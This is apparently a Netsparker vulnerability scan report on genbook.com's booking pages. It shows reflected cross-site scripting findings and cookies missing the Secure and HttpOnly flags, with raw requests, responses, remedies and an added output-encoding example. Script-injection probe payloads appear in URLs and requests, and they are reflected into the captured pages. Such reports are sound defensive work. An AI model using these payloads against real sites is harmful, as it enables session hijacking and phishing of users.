<div style="width:856px; margin: 0 auto; margin-top:3px;">
<div style="float:right;"><img src="images/CB_fullpage_footer.gif"/></div>

Schedule an appointment online with Cloud Nine in oakland, California

</div>
</div>
<div id="header_bg2">
<div id="header">
<div id="counterHolder">
<div class="detached">
<img src="images/counter_corner.gif" id="counterImage"/>
<div id="counterGrey"><div id="counterText">Slot will be held for <span id="minsremaining"></span></div></div>
</div>
</div>
<h1 id="businessname">Cloud Nine</h1>
<div id="businessaddress">5495 A claremont ave., oakland, CA 94618</div>

</div>
</div>


<div class="tabSection">
<div class="spacingDiv" style="width:12px;"></div>
<div class="tabDiv tabDivSelected"><a href="slot/reservation/30012013?'"--></style></script><script>netsparker(0x00078C)</script>">Make an Appointment</a></div>
<div class="spacingDiv" style="width:6px;"></div>
<div class="tabDiv"><a href="http://www.genbook.com/bookings/slot/reservation/30012013/reviews?'"--></style></script><script>netsparker(0x00078C)</script>">Reviews (141)</a></div>
<div class="spacingDiv" style="width:auto;float:none;">&nbsp;</div>
</div>
<div style="clear:both;margin-bottom:13px;"></div>
<div id="bookingbody">

<table class="mainTable" cellspacing="0" cellpadding="0" border="0">
<tr>
<td class="mainTableC1">


<div style="border-bottom:1px solid #DBDBDB;padding-bottom:20px; width:500px;" id="breadcrumbDiv">
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td class="breadCrumbC2">
<img src="images/CB_fullpage_breadcrumbs1.gif" usemap="#breadCrumbs" border="0"/>
</td>
</tr>
</table>
</div>

<map name="breadCrumbs" id="breadCrumbs">


</map>


<h2>Select a service to schedule an appointment</h2>
<dl id="servicecategories">
<dt>Service Category</dt>
<dd>
<ul>
<li><div class="category_selected"><div class="test">Waxing</div></div></li>
<li><a href="slot/reservation/30012013?bookingContactId=194997996&category=1644550">Threading</a></li>
<li><a href="slot/reservation/30012013?bookingContactId=194997996&category=1644835">Tinting</a></li>
<li><a href="slot/reservation/30012013?bookingContactId=194997996&category=1644900">Facials</a></li>
<li><a href="slot/reservation/30012013?bookingContactId=194997996&category=1645030">Body Treatments</a></li>
<li><a href="slot/reservation/30012013?bookingContactId=194997996&category=1885600">Combination</a></li>
</ul>
</dd>
</dl>
<div id="services">

<a name="1644369" class="servicecategory">Waxing</a>
<dl>


<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644376?bookingContactId=194997996">Brow - $20.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644332?bookingContactId=194997996">Lip - $10.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644383?bookingContactId=194997996">Chin or Cheek - $12.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644399?bookingContactId=194997996">Full Face - $55.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644419?bookingContactId=194997996">Brazilian Bikini - $55.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644403?bookingContactId=194997996">Bikini Wax - $25.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644389?bookingContactId=194997996">Extended Bikini Wax - $35.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644461?bookingContactId=194997996">Underarm - $17.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644671?bookingContactId=194997996">Half Arm - $20.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644650?bookingContactId=194997996">Full Arm - $35.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644646?bookingContactId=194997996">Back or Chest - $30.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644435?bookingContactId=194997996">Half Leg - $35.00</a>
</dt>
<dd></dd>



<dt style="padding-bottom:4px;">
<a href="slot/reservation/30012013/1644428?bookingContactId=194997996">Full Leg - $60.00</a>
</dt>
<dd></dd>

























</dl>








</div>


</td>
<td class="mainTableC2">
<img style="padding-bottom:15px;" src="images/map_details.gif">

<div id="googleMapsDiv" class="googleMapDivDefault"></div>
<map name="googleInnacurateMap">
<area shape="rect" coords="227,10,300,23" href="http://maps.google.com/maps?q=5495 A claremont ave.,oakland,CA 94618&z=13" target="_blank" />
</map>
<div class="googleMapDivInnacurate" id="googleMapDivInnacurate"><img src="images/unabletofind.gif" width="318" height="29" border="0" usemap="#googleInnacurateMap" /></div>
<br/>

<div class="vcard" itemscope itemtype="http://data-vocabulary.org/Organization">
<div><strong class="fn org" itemprop="name">Cloud Nine</strong></div>
<div class="adr" itemscope itemprop="address">
<div class="bizaddress"><span class="street-address" itemprop="street-address">5495 A claremont ave.</span></div>
<div class="bizaddress"><span class="locality" itemprop="locality">oakland</span>, <span class="region" itemprop="region">CA</span> <span class="postal-code" itemprop="postal-code">94618</span></div>
</div>
<div class="bizaddress">
<a class="url" itemprop="url" href="http://cloudninesalon.biz" target="_blank">http://cloudninesalon.biz</a>
</div>
</div>
<a href="#" onclick="showMoreDetails(); return false;" style="font-size:11px;">more details</a>
<div>
<div id="businessClosed" style="display:none;">
<br/>
<div id="businessHours" >
<div>
<strong>Business Hours</strong>
</div>
<div class="bizhour">
<div class="dayname">Mon</div>
<div>10:00am - 7:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Tue</div>
<div>10:00am - 7:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Wed</div>
<div>10:00am - 7:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Thu</div>
<div>10:00am - 7:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Fri</div>
<div>10:00am - 7:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Sat</div>
<div>9:00am - 6:00pm</div>
</div>
<div class="bizhour">
<div class="dayname">Sun</div>
<div>9:00am - 2:00pm</div>
</div>
</div>

<br/>
<div id="closedDays" >
</div>

</div>
<br/>
<div class="hreview review latestreview" itemscope itemtype="http://data-vocabulary.org/Review">
<div class="item vcard offscreen" itemprop="itemreviewed" itemscope itemtype="http://data-vocabulary.org/Organization">
<div class="fn org" itemprop="name">Cloud Nine</div>
<span class="adr" itemprop="address" itemscope itemtype="http://data-vocabulary.org/Address">
<span class="street-address" itemprop="street-address">5495 A claremont ave.</span>,&nbsp;
<span class="locality" itemprop="locality">oakland</span>,&nbsp;
<span class="region" itemprop="region">CA</span>&nbsp;
<span class="postal-code" itemprop="postal-code">94618</span>,
</span>
<a class="url" itemprop="url" href="http://cloudninesalon.biz" target="_blank">http://cloudninesalon.biz</a>
</div>
<img src="images/latest_review.gif" alt="Latest review" />
<div class="summaryrating">
<div class="summary"><span class="dtreviewed" title="2011-04-24" itemprop="dtreviewed" datetime="2011-04-24">Apr 24, 2011</span></div>
<div class="rating"><span class="rating blend" itemprop="rating">5</span> <img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
</div>
</div>
<div class="description" itemprop="description">Alresa is fast, friendly and fabulous! I have been a client for a while, and have put my unruly brows in her skilled hands before my wedding and most recently before my upcoming baby shower. She has NEVER disappointed. It's like going to see a friend but you leave looking fantastic. You'll love her like I do!</div>
<div class="allreviews"><a href="http://www.genbook.com/bookings/slot/reservation/30012013/reviews?'"--></style></script><script>netsparker(0x00078C)</script>">Read all 141 reviews</a></div>
</div>
</div>


</td>
</tr>
</table>
</div>
<br/>

<div id="footer_full">

<div id="footerlogo">
<a href="http://www.genbook.com/" target="_blank"><img style="margin-bottom:0px; margin-right:7px;" src="images/genbook_mediumlogo.gif"/></a>
Hassle-Free <a href="http://www.genbook.com/" target="_blank">online appointment scheduling</a> for your small business
</div>

<div class="footer_indv fineprint">Copyright &copy; Genbook, Inc. <a href="/bookings/privacypolicy.action" onclick="window.open('/bookings/privacypolicy.action','');return false;">Privacy Policy</a> | <a href="/bookings/termsconditions.action" onclick="window.open('/bookings/termsconditions.action','');return false;">Terms &amp; Conditions</a> | <a href="http://twitter.com/genbookteam" target="_blank"><img src="images/twittericon.gif"/> Follow us</a> | <a href="http://facebook.com/genbook" target="_blank"><img src="images/facebookicon.gif"/> Like</a> |&nbsp;&nbsp;<a href="http://www.genbook.com" target="_blank" class="normal_link">www.genbook.com</a></div>

</div>




<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">
_udn="none";
_ulink=1;
_uacct = "UA-1818709-3";
urchinTracker("/booking/select-service/30012013");
</script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">
_udn="none";
_ulink=1;
_uacct = "UA-1818709-8";
urchinTracker("/booking/bookingpage/30012013");
</script>

<script type="text/javascript">
<!--
var latLong=null;
var zoom=13;

window.setTimeout('setAddressDiv("5495 A claremont ave., oakland, CA 94618", document.getElementById("googleMapsDiv"),false,latLong,zoom)',0);
//-->
</script>
- /bookings/slot/reservation/30010843

/bookings/slot/reservation/30010843 CONFIRMED

http://www.genbook.com/bookings/slot/reservation/30010843?'"--></style></script><script>alert(0x0007..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000786)</script>

Request

GET /bookings/slot/reservation/30010843?'"--></style></script><script>netsparker(0x000786)</script> HTTP/1.1
Referer: http://www.genbook.com/sitemap.xml
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Cookie: CUSTOMER_COOKIE=194997989; JSESSIONID=17rrm2ulow3xp.cb1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:01:08 GMT
Server: Jetty(6.1.21)
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: CUSTOMER_COOKIE=194997995
X-UA-Compatible: IE=7
Transfer-Encoding: chunked



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<base href="http://www.genbook.com/bookings/" />
<title>Schedule an online appointment with Mochi Massage in San Francisco, California</title>
<link rel="stylesheet" type="text/css" href="style/booking_full.css" />
<script type="text/javascript">
//<![CDATA[
var CREDIT_CARD_ENABLED =false;
if (CREDIT_CARD_ENABLED) {
var COUNTDOWN_TIME = 600000;
} else {
var COUNTDOWN_TIME = 300000;
}
//]]>
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=3&amp;key=ABQIAAAAMzaxyPHBQRw4oILtM06ndBRGfDxDHatskTZIZdAqqgpnM33YYRQR2ZDYo85gatuUWMdauygvHxwpkw" type="text/javascript"></script>
<script type="text/javascript" src="script/googlemaps.js"></script>


<script type="text/javascript">
//<![CDATA[
function showMoreDetails() {
var oElement = document.getElementById("businessClosed");
if (oElement.style.display == "none") {
oElement.style.display = "block";
} else {
oElement.style.display = "none";
}
}
//]]>
</script>
</head>
<body onload="javascript:initializeGoogleMaps();">
<div id="header_bg">
<div style="width:856px; margin: 0 auto; margin-top:3px;">
<div style="float:right;"><img src="images/CB_fullpage_footer.gif"/></div>

Schedule an appointment online with Mochi Massage in San Francisco, California

</div>
</div>
<div id="header_bg2">
<div id="header">
<div id="counterHolder">
<div class="detached">
<img src="images/counter_corner.gif" id="counterImage"/>
<div id="counterGrey"><div id="counterText">Slot will be held for <span id="minsremaining"></span></div></div>
</div>
</div>
<img src="serviceprovider/30010843/logo" alt="Logo" width="128" height="78"/>
<h1 id="businessname">Mochi Massage</h1>
<div id="businessaddress">582 Market St., Suite 908, San Francisco, CA 94104</div>

</div>
</div>


<div class="tabSection">
<div class="spacingDiv" style="width:12px;"></div>
<div class="tabDiv tabDivSelected"><a href="slot/reservation/30010843?'"--></style></script><script>netsparker(0x000786)</script>">Make an Appointment</a></div>
<div class="spacingDiv" style="width:6px;"></div>
<div class="tabDiv"><a href="http://www.genbook.com/bookings/slot/reservation/30010843/reviews?'"--></style></script><script>netsparker(0x000786)</script>">Reviews (50)</a></div>
<div class="spacingDiv" style="width:auto;float:none;">&nbsp;</div>
</div>
<div style="clear:both;margin-bottom:13px;"></div>
<div id="bookingbody">

<table class="mainTable" cellspacing="0" cellpadding="0" border="0">
<tr>
<td class="mainTableC1">


<div style="border-bottom:1px solid #DBDBDB;padding-bottom:20px; width:500px;" id="breadcrumbDiv">
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td class="breadCrumbC2">
<img src="images/CB_fullpage_breadcrumbs1.gif" usemap="#breadCrumbs" border="0"/>
</td>
</tr>
</table>
</div>

<map name="breadCrumbs" id="breadCrumbs">


</map>


<h2>Select a service to schedule an appointment</h2>
<dl id="servicecategories">
<dt>Service Category</dt>
<dd>
<ul>
<li><div class="category_selected"><div class="test">Full Sessions</div></div></li>
<li><a href="slot/reservation/30010843?bookingContactId=194997995&category=53792482">20-Minute Wellness</a></li>
</ul>
</dd>
</dl>
<div id="services">

<a name="793682" class="servicecategory">Full Sessions</a>
<dl>











<dt>
<a href="slot/reservation/30010843/822685?bookingContactId=194997995">Mochi Melt (40 min) - $60.00</a>
</dt>
<dd>Utilizing effective shiatsu moves, we will work with you on breathing, awareness and letting go of tension. You'll feel invigorated and ready to take on the rest of the day!</dd>



<dt>
<a href="slot/reservation/30010843/822690?bookingContactId=194997995">Mo' Chi is Mo' Bettah (60 min) - $85.00</a>
</dt>
<dd>This full-hour bodywork session begins with Swedish bodywork to increase blood circulation in your muscles, and shiatsu techniques to enhance internal health. The session ends with blissful and centering work on your head and neck. </dd>



<dt>
<a href="slot/reservation/30010843/822733?bookingContactId=194997995">Mochi Medicine (90 min) - $125.00</a>
</dt>
<dd>Using a plethora of swedish, shiatsu and deep tissue techniques, this 90-minute session will get your chi flowing, address specific areas of tension and leave you feeling relaxed, rejuvenated and ready to face the world.</dd>



<dt>
<a href="slot/reservation/30010843/822710?bookingContactId=194997995">Traditional Zen Shiatsu - $125.00</a>
</dt>
<dd>90 minutes of bodywork done on a shiatsu mat. Performed over a sheet using no oil or creams, Zen Shiatsu works to rebalance your energy, leaving you relaxed but invigorated. </dd>
















<dt>
<a href="slot/reservation/30010843/57407766?bookingContactId=194997995">1/2 and 1/2 (90 minutes) - $125.00</a>
</dt>
<dd>Get your breathing on with this fabulous combination of bodywork and yoga. 45 minutes of one-on-one restorative yoga followed by 45 minutes of deeply therapeutic massage. It's the best of both worlds.</dd>



<dt>
<a href="slot/reservation/30010843/57414128?bookingContactId=194997995">Mo'chi for Mamas (60 minutes) - $100.00</a>
</dt>
<dd>A session designed especially for busy mamas-to-be. Our convenient location and nurturing touch makes for the ideal way to take care of yourself and your baby. Say goodbye to stress, aches, and swelling. </dd>





</dl>





</div>


</td>
<td class="mainTableC2">
<img style="padding-bottom:15px;" src="images/map_details.gif">

<div id="googleMapsDiv" class="googleMapDivDefault"></div>
<map name="googleInnacurateMap">
<area shape="rect" coords="227,10,300,23" href="http://maps.google.com/maps?q=37.7895393371582,-122.401611328125(Mochi Massage)&ll=37.7895393371582,-122.401611328125&z=13" target="_blank" />
</map>
<div class="googleMapDivInnacurate" id="googleMapDivInnacurate"><img src="images/unabletofind.gif" width="318" height="29" border="0" usemap="#googleInnacurateMap" /></div>
<br/>

<div class="vcard" itemscope itemtype="http://data-vocabulary.org/Organization">
<div><strong class="fn org" itemprop="name">Mochi Massage</strong></div>
<div class="adr" itemscope itemprop="address">
<div class="bizaddress"><span class="street-address" itemprop="street-address">582 Market St., Suite 908</span></div>
<div class="bizaddress"><span class="locality" itemprop="locality">San Francisco</span>, <span class="region" itemprop="region">CA</span> <span class="postal-code" itemprop="postal-code">94104</span></div>
</div>
<div class="bizaddress">
<a class="url" itemprop="url" href="http://www.mochimassage.com" target="_blank">http://www.mochimassage.com</a>
</div>
</div>
<a href="#" onclick="showMoreDetails(); return false;" style="font-size:11px;">more details</a>
<div>
<div id="businessClosed" style="display:none;">
<br/>
<div id="businessHours" >
<div>
<strong>Business Hours</strong>
</div>
<div class="bizhour">
<div class="dayname">Mon</div>
<div>4:00pm - 8:00pm</div>
</div>
<div class="bizhour">
<div class="dayname">Tue</div>
<div>10:00am - 8:00pm</div>
</div>
<div class="bizhour">
<div class="dayname">Wed</div>
<div>10:00am - 8:00pm</div>
</div>
<div class="bizhour">
<div class="dayname">Thu</div>
<div>10:00am - 8:00pm</div>
</div>
<div class="bizhour">
<div class="dayname">Fri</div>
<div>9:00am - 6:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Sat</div>
<div>12:00pm - 4:00pm</div>
</div>
</div>

<br/>
<div id="closedDays" >

</div>

</div>
<br/>
<div class="hreview review latestreview" itemscope itemtype="http://data-vocabulary.org/Review">
<div class="item vcard offscreen" itemprop="itemreviewed" itemscope itemtype="http://data-vocabulary.org/Organization">
<div class="fn org" itemprop="name">Mochi Massage</div>
<span class="adr" itemprop="address" itemscope itemtype="http://data-vocabulary.org/Address">
<span class="street-address" itemprop="street-address">582 Market St., Suite 908</span>,&nbsp;
<span class="locality" itemprop="locality">San Francisco</span>,&nbsp;
<span class="region" itemprop="region">CA</span>&nbsp;
<span class="postal-code" itemprop="postal-code">94104</span>,
</span>
<a class="url" itemprop="url" href="http://www.mochimassage.com" target="_blank">http://www.mochimassage.com</a>
</div>
<img src="images/latest_review.gif" alt="Latest review" />
<div class="summaryrating">
<div class="summary"><span class="dtreviewed" title="2011-04-20" itemprop="dtreviewed" datetime="2011-04-20">Apr 20, 2011</span></div>
<div class="rating"><span class="rating blend" itemprop="rating">5</span> <img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
</div>
</div>
<div class="description" itemprop="description">I went there yesterday at lunch this week. It was awesome ! I want to go back as soon as I can. I have got a back massage and it works perfectly. YOu should that this out !</div>
<div class="allreviews"><a href="http://www.genbook.com/bookings/slot/reservation/30010843/reviews?'"--></style></script><script>netsparker(0x000786)</script>">Read all 50 reviews</a></div>
</div>
</div>


</td>
</tr>
</table>
</div>
<br/>

<div id="footer_full">

<div id="footerlogo">
<a href="http://www.genbook.com/" target="_blank"><img style="margin-bottom:0px; margin-right:7px;" src="images/genbook_mediumlogo.gif"/></a>
Hassle-Free <a href="http://www.genbook.com/" target="_blank">online appointment scheduling</a> for your small business
</div>

<div class="footer_indv fineprint">Copyright &copy; Genbook, Inc. <a href="/bookings/privacypolicy.action" onclick="window.open('/bookings/privacypolicy.action','');return false;">Privacy Policy</a> | <a href="/bookings/termsconditions.action" onclick="window.open('/bookings/termsconditions.action','');return false;">Terms &amp; Conditions</a> | <a href="http://twitter.com/genbookteam" target="_blank"><img src="images/twittericon.gif"/> Follow us</a> | <a href="http://facebook.com/genbook" target="_blank"><img src="images/facebookicon.gif"/> Like</a> |&nbsp;&nbsp;<a href="http://www.genbook.com" target="_blank" class="normal_link">www.genbook.com</a></div>

</div>




<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">
_udn="none";
_ulink=1;
_uacct = "UA-1818709-3";
urchinTracker("/booking/select-service/30010843");
</script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">
_udn="none";
_ulink=1;
_uacct = "UA-1818709-8";
urchinTracker("/booking/bookingpage/30010843");
</script>

<script type="text/javascript">
<!--
var latLong=null;
var zoom=13;
latLong=new GLatLng(37.7895393371582,-122.401611328125);

window.setTimeout('setAddressDiv("582 Market St., Suite 908, San Francisco, CA 94104", document.getElementById("googleMapsDiv"),false,latLong,zoom)',0);
//-->
</script>


<!-- Begin comScore Tag -->
<script>
document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js' %3E%3C/script%3E"));
</script>

<script>
COMSCORE.beacon({
c1:2,
c2:7517143,
c3:"",
c4:"",
c5:"",
c6:"",
c15:""
});
</script>
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=7517143&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
<!-- End comScore Tag -->
</body>
</html>
Cookie Not Marked As Secure

Cookie Not Marked As Secure

1 TOTAL
IMPORTANT
CONFIRMED
1
A cookie set over HTTPS was not marked Secure. Without that attribute the browser will also send the cookie over plain HTTP, so an attacker who can intercept the victim's traffic (for example from a MITM, man-in-the-middle, position) can read it without having to break TLS.

Impact

The browser will send this cookie over an unencrypted HTTP connection as well as over HTTPS. If the cookie carries authentication state (a session identifier, for instance), an attacker who intercepts it can hijack the victim's session. An attacker in a MITM position does not have to wait for the victim to browse the site over HTTP: injecting an http:// image or redirect to the site into any unencrypted page the victim loads forces the browser to make a plain HTTP request that carries the cookie.

Actions to Take

  1. See the remedy for the solution.
  2. Mark all cookies used within the application as Secure. (A cookie that is unrelated to authentication and carries no personal information does not strictly need the attribute, but setting it everywhere is the simpler policy.)

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires a position on the network path between the victim and the web server: a foothold on the victim's local (layer 2) network segment, physical access to a device the traffic passes through, or control of an intermediate system that has already been compromised.
- /manager/

/manager/ CONFIRMED

https://www.genbook.com/manager/

Identified Cookie

seraph.os.cookie

Request

GET /manager/ HTTP/1.1
Referer: https://www.genbook.com/manager/forgotpassword
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 302 Found
Date: Tue, 26 Apr 2011 00:59:41 GMT
Server: Jetty(6.1.21)
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://www.genbook.com/manager/browsernotsupported.action
Content-Length: 0
Set-Cookie: seraph.os.cookie=;Path=/manager;Expires=Thu, 01 Jan 1970 00:00:00 GMT
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/plain; charset=UTF-8


[Possible] Cross-site Scripting

[Possible] Cross-site Scripting

1 TOTAL
MEDIUM
XSS (Cross-site Scripting) allows an attacker to execute script (JavaScript, VBScript) in the context of the application. This opens several attack opportunities, most commonly hijacking the user's current session or rewriting the page's HTML on the fly to capture the user's credentials. It happens because input supplied by a user is interpreted as HTML or script by the browser.

Netsparker believes there is an XSS (Cross-site Scripting) issue here but could not confirm it. We strongly recommend investigating the issue manually to determine whether it is exploitable and needs to be addressed.

XSS targets the users of the application rather than the server. That limits the direct impact, but because it lets an attacker hijack other users' sessions, an attack aimed at an administrator can yield full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hijacking users' active sessions.
  • Changing the look of the page within the victim's browser.
  • Mounting a successful phishing attack.
  • Intercepting data and performing man-in-the-middle attacks against the user's interaction with the application.

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, every value written into a response should be encoded for the context it lands in (HTML body, HTML attribute, JavaScript string, URL), and input should be validated against its expected format wherever that format is known.

A number of well-structured, whitelist-based encoding libraries exist for many environments; OWASP Reform and the Microsoft Anti-Cross Site Scripting Library are good examples.

Remedy References

External References

- /bookings/booknowjstag.action

/bookings/booknowjstag.action

http://www.genbook.com/bookings/booknowjstag.action?id=30134654&bookingSourceId='%22--%3E%3C/style%3..

Parameters

Parameter Type Value
id GET 30134654
bookingSourceId GET '"--></style></script><script>alert(0x00007F)</script>

Notes

The response is served as text/javascript (see the Content-Type header below), not text/html, so a browser that navigates to this URL directly will not parse the reflected markup as HTML; exploitation as HTML injection depends on the browser MIME-sniffing the response, as older Internet Explorer versions do. Netsparker does not confirm issues of this kind automatically; confirm it manually. Note also the context the value is reflected into: bookingSourceId lands inside a single-quoted JavaScript string literal passed to document.writeln, so the relevant injection context is the JavaScript string, not the HTML. A value containing a single quote terminates that literal, which is exactly what the alternative payload Netsparker sent against the same parameter (shown under Cookie Not Marked As HttpOnly below) does. The value therefore needs JavaScript string escaping, and the href it is written into needs HTML attribute encoding, in addition to any URL encoding.

Request

GET /bookings/booknowjstag.action?id=30134654&bookingSourceId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00007F)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Cookie: JSESSIONID=17rrm2ulow3xp.cb1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:00:01 GMT
Server: Jetty(6.1.21)
Content-Type: text/javascript; charset=UTF-8
Cache-Control: max-age=0
Expires: Tue, 26 Apr 2011 01:00:01 GMT
X-UA-Compatible: IE=7
Transfer-Encoding: chunked



var goTimer;
function urchinCheck() {
clearTimeout(goTimer);
try
{
urchinTracker("/booknowtag/30134654");
} catch (e) {
goTimer = window.setTimeout(urchinCheck, 100 );
}
}
var NL = '\n'
var sWrite = "";
document.writeln('<a href="http://www.genbook.com/bookings/slot/reservation/30134654?bookingSourceId='"--></style></script><script>netsparker(0x00007F)</script>" target="_blank"><img src="http://www.genbook.com/bookings/images/booknow.gif" width="100" height="34" alt="Make an Online Appointment" border="0"/></a>' + sWrite)
document.writeln('<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><br/>');
sWrite = '<script type="text/javascript">' + NL
sWrite += '_uacct="UA-1818709-3";' + NL
sWrite += '_udn="none";' + NL
sWrite += '_ulink=1;' + NL
sWrite += 'urchinCheck()' + NL
sWrite += '</script>' + NL
document.writeln(sWrite);
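
As an added example, not code from genbook.com, Netsparker or this report, the JavaScript below shows the two reflection contexts visible in the evidence and how each has to be encoded. The reservation pages echo the raw query string into an href attribute (HTML attribute context); booknowjstag.action echoes bookingSourceId inside a single-quoted JavaScript string literal that is later written out as HTML (JavaScript string context wrapping an HTML attribute context). The function names, the simplified anchor markup and the use of the report's own payloads as sample input are assumptions made for the example; the payload 10009769d';alert(1)//7010dea1bfa is the one Netsparker sent in the request shown under Cookie Not Marked As HttpOnly below.

```javascript
// Added example; not code from genbook.com, Netsparker or this report.
// Output encoding for the two reflection contexts visible in the findings.

// HTML attribute context: the reservation pages echo the raw query string
// into href="slot/reservation/<id>?<qs>". Encode the five HTML metacharacters
// so a value can neither close the attribute nor start a new tag.
function htmlAttrEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string-literal context: booknowjstag.action echoes bookingSourceId
// inside '...' passed to document.writeln. Escape every non-alphanumeric
// character, so quotes, backslashes, "</script>", newlines and U+2028/U+2029
// can end neither the literal nor the enclosing script block.
function jsStringEncode(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Evaluate a literal body the way the browser's JS parser would, to show that
// jsStringEncode round-trips. Only ever fed our own encoder output here.
function decodeJsLiteral(encodedBody) {
  return Function('"use strict"; return \'' + encodedBody + '\';')();
}

// Tab link in the shape the reservation page emits, with the query string
// encoded for the attribute it lands in (assumed markup, simplified).
function buildTabLink(id, queryString) {
  return '<div class="tabDiv tabDivSelected"><a href="slot/reservation/' + id
    + '?' + htmlAttrEncode(queryString) + '">Make an Appointment</a></div>';
}

// booknowjstag output in the vulnerable shape shown in the report: the
// parameter is concatenated straight into the JS literal.
function buildTagVulnerable(id, bookingSourceId) {
  return "document.writeln('<a href=\"http://www.genbook.com/bookings/slot/reservation/"
    + id + '?bookingSourceId=' + bookingSourceId
    + "\" target=\"_blank\">Book now</a>')";
}

// Hardened: validate the id, URL-encode the parameter value, then encode from
// the innermost context outward: HTML attribute first, JS string literal last.
// encodeURIComponent alone is not enough because it leaves ' unencoded.
function buildTagHardened(id, bookingSourceId) {
  if (!/^\d+$/.test(String(id))) throw new Error('id must be a numeric reservation id');
  const href = 'http://www.genbook.com/bookings/slot/reservation/' + id
    + '?bookingSourceId=' + encodeURIComponent(bookingSourceId);
  return "document.writeln('<a href=\"" + jsStringEncode(htmlAttrEncode(href))
    + "\" target=\"_blank\">Book now</a>')";
}

// Sample input constructed from the payloads in this report's requests.
const HTML_PAYLOAD = '\'"--></style></script><script>netsparker(0x00078C)</script>';
const JS_PAYLOAD = "10009769d';alert(1)//7010dea1bfa";

if (typeof require !== 'undefined' && require.main === module) {
  console.log(buildTabLink('30012013', HTML_PAYLOAD));
  console.log(buildTagVulnerable('30134654', JS_PAYLOAD));
  console.log(buildTagHardened('30134654', JS_PAYLOAD));
}
```

The order of encoding matters: the value is first made safe for the href attribute it will become, and only then for the JavaScript literal that carries it, so that after the browser decodes the literal and the HTML parser decodes the attribute, what remains is the original URL. Encoding is the minimum fix for the reservation pages; a better one is to rebuild the query string from the parameters the page actually understands rather than echoing whatever was received.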
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
The cookie was not marked HttpOnly. HttpOnly cookies cannot be read by client-side script, so marking a cookie HttpOnly provides an additional layer of protection against Cross-site Scripting attacks.

Impact

